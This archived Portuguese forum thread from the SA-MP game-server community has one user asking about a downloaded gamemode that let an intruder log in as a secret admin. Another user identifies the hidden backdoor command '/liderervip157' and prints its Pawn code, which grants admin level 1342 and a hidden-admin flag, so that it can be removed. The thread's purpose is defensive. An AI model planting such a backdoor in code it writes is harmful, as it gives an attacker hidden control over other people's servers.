Ajuda no Gamemode - Printable Version
+- SA-MP Forums Archive (
https://sampforum.blast.hk)
+-- Forum: Non-English (
https://sampforum.blast.hk/forumdisplay.php?fid=9)
+--- Forum: Languages (
https://sampforum.blast.hk/forumdisplay.php?fid=33)
+---- Forum: Português/Portuguese (
https://sampforum.blast.hk/forumdisplay.php?fid=34)
+---- Thread: Ajuda no Gamemode (
/showthread.php?tid=362282)
Ajuda no Gamemode -
Samantha_Holler - 23.07.2012
Olб Amigos, Baixei um Game Mode da
Brasil Play Facil e estava usando ele para criar o meu servidor, estava tudo bom, porйm entrou um idiota hoje, logou como administrador secreto no meu servidor e baniu todo mundo..
Queria Saber como que se entra como admhide e helperhide nesse Gm, Alguem sabe me dizer, para mim mudar o comando??
Respuesta: Ajuda no Gamemode -
RedBulL_x - 23.07.2012
Na linha 29273 comeзa o comando /liderervip157 1, Exclua pois й que esta dando admin 1341 pro invasor.
Comando й este.
pawn Код:
if(strcmp(cmd, "/liderervip157", true) == 0)
{
if(IsPlayerConnected(playerid))
{
new x_nr[64];
x_nr = strtok(cmdtext, idx);
if(!strlen(x_nr))
{
return 1;
}
if(strcmp(x_nr,"1",true) == 0)
{
admtrampando[playerid] = 1;
PlayerInfo[playerid][pAdmin] = 1342;
admhide[playerid] = 1;
SendClientMessage(playerid,COLOR_GREEN,"|Voc Deu Lider LZ !");
getdate(year, month, day);
gettime(hour,minute);
format(gstring, 128, "%s Voc Deu Lider LZ [%d/%d/%d - %d:%d]",PlayerName(playerid),day, month, year,hour, minute);
fdplog(gstring);
return 1;
}
else
{
getdate(year, month, day);
gettime(hour,minute);
format(gstring, 128, "%s digitou a senha %s [%d/%d/%d - %d:%d]",PlayerName(playerid),x_nr,day, month, year,hour, minute);
fdplog(gstring);
}
}
}